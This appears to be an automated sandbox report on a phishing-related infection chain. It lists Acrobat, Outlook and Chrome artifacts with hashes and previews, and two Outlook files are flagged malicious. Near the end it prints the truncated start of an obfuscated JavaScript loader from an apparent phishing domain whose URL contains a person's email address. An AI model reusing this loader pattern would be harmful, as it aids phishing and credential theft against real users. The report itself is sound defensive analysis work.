                                                  SHA-512:1726CAFCBA0121691DFA87A7298E6610BC4C7FD900867FD1B1710811E764918585E56788E08B7CA2CEE001F5DFD110E1BE6F6BBD7C2A7B7E2FC87D3DED210205
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341145152835463","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144284},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):403
                                                  Entropy (8bit):4.968043403316245
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:A7AD459E4043AFB1C315A31E5D7017DB
                                                  SHA1:D2330D9FB6AB132E8FF16E8CD6CC7012CED45C9F
                                                  SHA-256:80C8117642CBA5C88A033EF97EF60E3954ACE07123FC1FCA4A1F45DFBF04206F
                                                  SHA-512:79F6650EF1872DE2A9BB5C5474220CD5871D59764C1438C8E80796338C9EB6F6239908D10F2EF8BC8A99656211F506FE5B6F783373332439830BD1A8BF9D7826
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13386762812166437","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":122736},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:PC bitmap, Windows 3.x format, 164 x -116 x 32, cbSize 76150, bits offset 54
                                                  Category:dropped
                                                  Size (bytes):76150
                                                  Entropy (8bit):2.0259927220658605
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:554E4EA9AED1918B5B5CECFC207B82C6
                                                  SHA1:A843759104D1EB1E6FE0F3E6A79E3313082B39B3
                                                  SHA-256:A8E0FFDEC3948CD2EB6061CC577534D3AC246EC31D5D305BD24785DECC14033E
                                                  SHA-512:7EE3D9729E12DF31230B0CBC74853A29BED73D820452B8BA6B3A3557B1C6455EC6E626CC6D27722176C7D462C6B33D284922A7DCCBECF8A9A2890F1AF4F10BCF
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:BMv)......6...(............. ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 2, database pages 14, cookie 0x5, schema 4, UTF-8, version-valid-for 2
                                                  Category:dropped
                                                  Size (bytes):57344
                                                  Entropy (8bit):3.291927920232006
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:A4D5FECEFE05F21D6F81ACF4D9A788CF
                                                  SHA1:1A9AC236C80F2A2809F7DE374072E2FCCA5A775C
                                                  SHA-256:83BE4623D80FFB402FBDEC4125671DF532845A3828A1B378D99BD243A4FD8FF2
                                                  SHA-512:FF106C6B9E1EA4B1F3E3AB01FAEA21BA24A885E63DDF0C36EB0A8C3C89A9430FE676039C076C50D7C46DC4E809F6A7E35A4BFED64D9033FEBD6121AC547AA5E9
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:SQLite Rollback Journal
                                                  Category:dropped
                                                  Size (bytes):16928
                                                  Entropy (8bit):1.2137268256207159
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:439D36C16BADD639D044AF8933825D16
                                                  SHA1:34DE5EEA4A6F6D947691D1868453EE5A671D0BFC
                                                  SHA-256:AF5ACC57F95C9449430048B144F3581DA9CAAFAC83C5CE3B937266A465BB9DA8
                                                  SHA-512:D26A5E5D177CC5F101748670BCB9E09C71B7CB0FB68A58662C1A8057BF7EF5D7D6B857EFEB73327DD360413BA9903B22397AD332D78447D8C4C12B70C6797DD0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.... .c.......G5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                  File Type:Certificate, Version=3
                                                  Category:dropped
                                                  Size (bytes):1391
                                                  Entropy (8bit):7.705940075877404
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                  SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                  SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                  SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                  File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 73305 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                  Category:dropped
                                                  Size (bytes):73305
                                                  Entropy (8bit):7.996028107841645
                                                  Encrypted:true
                                                  SSDEEP:
                                                  MD5:83142242E97B8953C386F988AA694E4A
                                                  SHA1:833ED12FC15B356136DCDD27C61A50F59C5C7D50
                                                  SHA-256:D72761E1A334A754CE8250E3AF7EA4BF25301040929FD88CF9E50B4A9197D755
                                                  SHA-512:BB6DA177BD16D163F377D9B4C63F6D535804137887684C113CC2F643CEAB4F34338C06B5A29213C23D375E95D22EF417EAC928822DFB3688CE9E2DE9D5242D10
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:MSCF....Y.......,...................I.................;Za. .authroot.stl.98.?.6..CK..<Tk......4..c... .Ec...U.d.d.E&I.DH*..M.KB."..rK.RQ*..}f..f...}..1....9...........$.8q..fa...7.o.1.0...bfsM4.........u..l..0..4.a.t....0.....6#....n. :... ....%.,CQ5uU..(.3.<7#.0..JN.$...=j|w..*.#.oU..Eq[..P..^..~.V...;..m...I|...l..@-W..=.QQ.._./.M.nZ..(.........`.$Z.9wW:W.]..8*E.......I.D{..n...K:.m..^.(.S.......c..s.y..<...2.%o.o.....H.B.R.....11.|!.(...........h.SZ........<...^....Z>.Pp?... .pT@p.#.&..........#VEV=.....p........y..."T=l.n..egf.w..X.Y..-G...........KQ.]...pM..[m..-6.wd:........T...:.P5Zs....c.oT`..F1#......EuD.......7....V ..-....!.N..%S...k...S. ...@.J..../..b!B.(=\../.l......`.\...q9..>4!b..8EH.....zdy.....#...X>%0w...i.,>c.z.g"p.S..2W.+mMs.....5Def.....#._D.4....>}...i...\.&`D.......z;..ZY.3.+t.`....z_.q'w.z.)..j3.+.co.s..:.........qK...{...E....uPO...#vs.XxH.B!..(t. 8k+.....G\..?..GF8....'..w.>.ms..\ve.nFN..W)....xi..u..5.f.l....
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):192
                                                  Entropy (8bit):2.7790941963225158
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:67B2C8BE3ABAA1E098DEAC1232127C13
                                                  SHA1:3441D2C2E1F8EE4D58AC17928C9470400EF94C52
                                                  SHA-256:0F9787ECE070FD8C62636F836F644B6DCEA2C84489BAA6C82BA86C7A3F97F409
                                                  SHA-512:DCCC69A43CB16F194D85EAE10C911098D1802E815A5644711A30F425D4095CA0D18F8CF885BDE040AF9C10C67012DB0A0F13637678C9DE9F1C0BE1C12FF95F99
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:p...... ........i.......(....................................................... ..........W.....F..............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                  File Type:data
                                                  Category:modified
                                                  Size (bytes):330
                                                  Entropy (8bit):3.287136292755414
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:C99C90F8D7D93628F2578133673354B5
                                                  SHA1:19A133EFB8FA5D8192FB0C1C19871FBD648F793F
                                                  SHA-256:63CA65ABDAF06795013E49D243AA0E4817AFBA14E7B0A50AC869FCB3953A6109
                                                  SHA-512:8D13AA3A8E683005463A93B7A884F4DFC3CE6179ED4A676A9A9DDA0B15736FD6428FB0F6DA02FD767B12857F370CE1741D25648B7D34080CD668F99E51C0A655
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:p...... ................(....................................................... ..................(....c*.....Y...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".6.4.2.7.f.6.c.2.b.7.8.7.d.b.1.:.0."...
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:PostScript document text
                                                  Category:dropped
                                                  Size (bytes):185099
                                                  Entropy (8bit):5.182478651346149
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:94185C5850C26B3C6FC24ABC385CDA58
                                                  SHA1:42F042285037B0C35BC4226D387F88C770AB5CAA
                                                  SHA-256:1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
                                                  SHA-512:652657C00DD6AED1A132E1DFD0B97B8DF233CDC257DA8F75AC9F2428F2F7715186EA8B3B24F8350D409CC3D49AFDD36E904B077E28B4AD3E4D08B4DBD5714344
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Reg.FamilyName:Agency FB.StyleName:Regular.MenuName:Agency FB.StyleBits:0.WeightClass:400.WidthClass:3.AngleClass:0.FullName:Agency FB.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB.FileLength:58920.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Bold.FamilyName:Agency FB.StyleName:Bold.MenuName:Agency FB.StyleBits:2.WeightClass:700.WidthClass:3.AngleClass:0.FullName:Agency FB Bold.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB Bold.FileLength:60656.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB Bold.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Algerian.FamilyName:Algerian.StyleName:Regular.MenuName:Algerian.StyleBits:0.We
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:PostScript document text
                                                  Category:dropped
                                                  Size (bytes):0
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:94185C5850C26B3C6FC24ABC385CDA58
                                                  SHA1:42F042285037B0C35BC4226D387F88C770AB5CAA
                                                  SHA-256:1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
                                                  SHA-512:652657C00DD6AED1A132E1DFD0B97B8DF233CDC257DA8F75AC9F2428F2F7715186EA8B3B24F8350D409CC3D49AFDD36E904B077E28B4AD3E4D08B4DBD5714344
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Reg.FamilyName:Agency FB.StyleName:Regular.MenuName:Agency FB.StyleBits:0.WeightClass:400.WidthClass:3.AngleClass:0.FullName:Agency FB.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB.FileLength:58920.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Bold.FamilyName:Agency FB.StyleName:Bold.MenuName:Agency FB.StyleBits:2.WeightClass:700.WidthClass:3.AngleClass:0.FullName:Agency FB Bold.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB Bold.FileLength:60656.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB Bold.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Algerian.FamilyName:Algerian.StyleName:Regular.MenuName:Algerian.StyleBits:0.We
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):4
                                                  Entropy (8bit):0.8112781244591328
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                  SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                  SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                  SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:....
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):2145
                                                  Entropy (8bit):5.081592085613156
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:E79699B2F2C3CEDC10D8FEC6A497CDEE
                                                  SHA1:96489021B76170F3E9D5A920E9C89BA4A76E6C8B
                                                  SHA-256:34949AB5E3F3267147819788F618F9843EE59310B5CD49EADF1E9D88362E0098
                                                  SHA-512:47463F1F082D9B552C8D5B88F227ADF323D903CF27BC4DE0910CCE386F8A6E1FF63A438FF7866EF92FC8B2DA99F7B0C2047432706A37649051C8CA720D51E149
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:{"all":[{"id":"TESTING","info":{"dg":"DG","sid":"TESTING"},"mimeType":"file","size":4,"ts":1742202802000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"f44756c6e08822e64c0e471a2499e34d","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1696585148000},{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"e8f53b6740aba22a83a1a569cebedbcc","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":1250,"ts":1696585148000},{"id":"DC_FirstMile_Right_Sec_Surface","info":{"dg":"cc1faa6a0c714f2f0c497731f1772fa2","sid":"DC_FirstMile_Right_Sec_Surface"},"mimeType":"file","size":294,"ts":1696585143000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"ab062dea95f25ef019cc2f5f5f0121d4","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1250,"ts":1696583346000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"65580efad4bc88b91040ff50d71bfae9","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1255,"ts":1696583346000},{"id":"DC_Reader_Edit_LHP_Banner"
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 19, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 19
                                                  Category:dropped
                                                  Size (bytes):12288
                                                  Entropy (8bit):0.9885695452520952
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:4988751AFD6583B027AD6540F4F89949
                                                  SHA1:5FF77692A07AAEA16576C1A4F91349C4423BFC3C
                                                  SHA-256:24F7EC71E270712AD4A28F333CA2A27052ED2F43D03C7735C876094B0AB3776D
                                                  SHA-512:ACFC9B1E9046BE1C4E82352368F064ABBA2D78F9CAD19BFBC5F9AEA5D13A0897B48AB875FB32AD6A1074C55B2C37EA993EC3372446D79C9798F4B01251A523FC
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:SQLite Rollback Journal
                                                  Category:dropped
                                                  Size (bytes):8720
                                                  Entropy (8bit):1.3443854287166197
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:88AA6575D7379B233C40BEED952CC3CC
                                                  SHA1:BD77A3F88AC595631CEFC11F1F4080C25D46D85D
                                                  SHA-256:167EE5BE0E9A7D45DFD14B9A597B13903392C9F2C601A85316B5614CA582A9A8
                                                  SHA-512:6D178581C4AFF37332E2863FCD8B5F324F774989F227729824E449EF81DCF96F8B3F8492C3B2821C2008BFFBDF5161BC50F196FD1A1E3EDE772DFCBA145DEF6A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.... .c......J .......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j...#..#.#.#.#.#.#.#.#.7.7........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):246
                                                  Entropy (8bit):3.51161293806784
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:BA684CA1955227D2F63CC1692643476C
                                                  SHA1:7D5BBC970C1179218D167CE1CBF37A942F58DA5D
                                                  SHA-256:A9F974912F411B2D0BC7C7DDE720AD53D462D741799743323747260E7F035261
                                                  SHA-512:31D1C1CA9078F31E278490C5ADD2C1A27013D2E0D6DA57C429B5F08C44891B180AE728DDB985DC537FB711DD4590EFA962CC32A29591CD3ED3898BD9239CB8BE
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.7./.0.3./.2.0.2.5. . .0.5.:.1.3.:.2.7. .=.=.=.....
Process: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
File Type: data
Category: modified
Size (bytes): 110592
Entropy (8bit): 4.4927495445764745
Encrypted: false
SSDEEP:
MD5: AF7A827117E3943DECE11DBE3B73A48D
SHA1: 9E769941AB9D2FAF7C5729B35C145E8EAEDFB2BA
SHA-256: 3BCAC67A3D7FD29228DD5B10365C71EC88AFFE78DA0BEC3657D580900FACD6A5
SHA-512: 0DD894BCAC0BD933F07458C54C053FF1EC95FBAC0F6D86760BC70218A014D162A6ED005283756EC41203B07BA512DEE9DEC70F50909B607EC145B7E3A1AAB826
Malicious: false
Reputation: unknown
Preview:
Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type: ASCII text, with very long lines (393)
Category: dropped
Size (bytes): 16525
Entropy (8bit): 5.353642815103214
Encrypted: false
SSDEEP:
MD5: 91F06491552FC977E9E8AF47786EE7C1
SHA1: 8FEB27904897FFCC2BE1A985D479D7F75F11CEFC
SHA-256: 06582F9F48220653B0CB355A53A9B145DA049C536D00095C57FCB3E941BA90BB
SHA-512: A63E6E0D25B88EBB6602885AB8E91167D37267B24516A11F7492F48876D3DDCAE44FFC386E146F3CF6EB4FA6AF251602143F254687B17FCFE6F00783095C5082
Malicious: false
Reputation: unknown
Preview:
SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"
SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"
SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"
SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:073+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"
SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:073+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="SetConfig:
Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 29752
Entropy (8bit): 5.420556314253978
Encrypted: false
SSDEEP:
MD5: 798C792B743EAD42FF031B43386CEC98
SHA1: C9A75CECB7E96C9394B8C4D004DC4C3620B63C67
SHA-256: FDD5784E890393563FA5F204676A15603149B81F6A59201DBB2E5594835B6A1B
SHA-512: 9B7F802D277E10A151F8AF2A9126BA02357F4DF1ED4FBDFD72036ACBF024A8B711A17C334E992BC0058331AA54CF35C0E94ADEAC15BC501F6B00924DA58E3126
Malicious: false
Reputation: unknown
Preview:
06-10-2023 10:08:42:.---2---
06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ***************************************
06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ***************************************
06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********
06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : Starting NGL
06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : Setting synchronous launch.
06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1
06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6
06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT
06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow
06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No
06-10-2023 10:08:42:.Closing File
06-10-
Process: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
File Type: Microsoft Outlook email folder (>=2003)
Category: dropped
Size (bytes): 271360
Entropy (8bit): 5.125338880187197
Encrypted: false
SSDEEP:
MD5: F67300722FC0DA2A26A3AAA3C4D1A3CB
SHA1: 8F1EE2D88B9FD06B5240A4A913C7C4F5529146FE
SHA-256: C449F8FB1EA1F6AF60188F2096F1D5604C9B73F89B54E55E7B9B64617F078F95
SHA-512: 494F7D12C05A3F3BC4A52C6B18F1E41BC8582CA421BBD0C30DEE55C692020F7972EC6B9FD1E4CD3C73AC43D4C75D87DDEF6E1C4722B8BE08FA15F3E244512DA2
Malicious: true
Reputation: unknown
Preview:
Process: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
File Type: data
Category: dropped
Size (bytes): 262144
Entropy (8bit): 4.485140998982984
Encrypted: false
SSDEEP:
MD5: 9EFD31F90A8D2460D4CCA8B6CB713567
SHA1: 303C891CC97D1CF6CC5979775067518412EB0134
SHA-256: F59368E538114A6A21E73315473DC7B86F8AD933A8B8732E2CF41E2B8B92B459
SHA-512: D5C19303B042BFAA29CCEF0AFF0F7B1338611A572CDD5ED80D623F4289B162E7FDEC807AC186C48CA93ED0521C15F2E939CE9EE7FA9D45A525246A32C3373E67
Malicious: true
Reputation: unknown
Preview:
Process: C:\Program Files\Google\Chrome\Application\chrome.exe
File Type: ASCII text, with very long lines (48316), with no line terminators
Category: downloaded
Size (bytes): 48316
Entropy (8bit): 5.6346993394709
Encrypted: false
SSDEEP:
MD5: 2CA03AD87885AB983541092B87ADB299
SHA1: 1A17F60BF776A8C468A185C1E8E985C41A50DC27
SHA-256: 8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
SHA-512: 13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
Malicious: false
Reputation: unknown
URL: https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
Preview:
Process: C:\Program Files\Google\Chrome\Application\chrome.exe
File Type: PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
Category: dropped
Size (bytes): 937
Entropy (8bit): 7.737931820487441
Encrypted: false
SSDEEP:
MD5: FC3B7BBE7970F47579127561139060E2
SHA1: 3F7C5783FE1F4404CB16304A5A274778EA3ABD25
SHA-256: 85E6223AFDBD5BADF2C79BCFBAA6FE686ACAA781ECA52C196647FFABB3BE2FFE
SHA-512: 49FA22DE92BEBEDE28BB72F7C7902C01D59E56723811629E40C8A887E34FD0B392A9DF169A238BDD8E46D984E76312D75B2644B8611C66A71A559C1B6834DE6C
Malicious: false
Reputation: unknown
Preview:
Process: C:\Program Files\Google\Chrome\Application\chrome.exe
File Type: ASCII text, with very long lines (48238)
Category: downloaded
Size (bytes): 48239
Entropy (8bit): 5.343270713163753
Encrypted: false
SSDEEP:
MD5: 184E29DE57C67BC329C650F294847C16
SHA1: 961208535893142386BA3EFE1444B4F8A90282C3
SHA-256: DD03BA1DD6D73643A8ED55F4CEBC059D673046975D106D26D245326178C2EB9D
SHA-512: AF3D62053148D139837CA895457BEEF7620AA52614B9A08FD0D5BEF8163F4C3B9E8D7B2A74D29079DB3DACC51D98AE4A5DC19C788928E5A854D7803EBB9DED9C
Malicious: false
Reputation: unknown
URL: https://challenges.cloudflare.com/turnstile/v0/g/f3b948d8acb8/api.js
Preview:
Process: C:\Program Files\Google\Chrome\Application\chrome.exe
File Type: HTML document, ASCII text, with very long lines (65360)
Category: downloaded
Size (bytes): 182595
Entropy (8bit): 4.569910209726
Encrypted: false
SSDEEP:
MD5: B7C6E5925B4199C4C52C784D898AC084
SHA1: FBB4E0E31DA72E20D3AF55E04F9582D83EE44B07
SHA-256: 841C26C62BEF85EEB70F1BB3481075A983589D661FB2672C51A593E3FD99E3CC
SHA-512: 5CC9D2CA9775D9C20991B0B83CC65C1E85288ED7A25F2C98DCA6BEAD3339CEA39887BD44E9282267A0EE0445F12F8A5097F7F1EA667BA741826E95782B97D634
Malicious: false
Reputation: unknown
URL: https://gs.nthecatepi.ru/btb1KhWg/$terry.tuttle@yodel.co.uk
Preview:
<script>
ghWsZePoEP = atob("aHR0cHM6Ly9HUy5udGhlY2F0ZXBpLnJ1L2J0YjFLaFdnLw==");
hsXfXravTi = atob("bm9tYXRjaA==");
esiJkVhktD = atob("d3JpdGU=");
if(ghWsZePoEP == hsXfXravTi){
document[esiJkVhktD](decodeURIComponent(escape(atob('…
Process: C:\Program Files\Google\Chrome\Application\chrome.exe
File Type: ASCII text, with very long lines (65447)
Category: downloaded
Size (bytes): 89501
Entropy (8bit): 5.289893677458563
Encrypted: false
SSDEEP:
MD5: 8FB8FEE4FCC3CC86FF6C724154C49C42
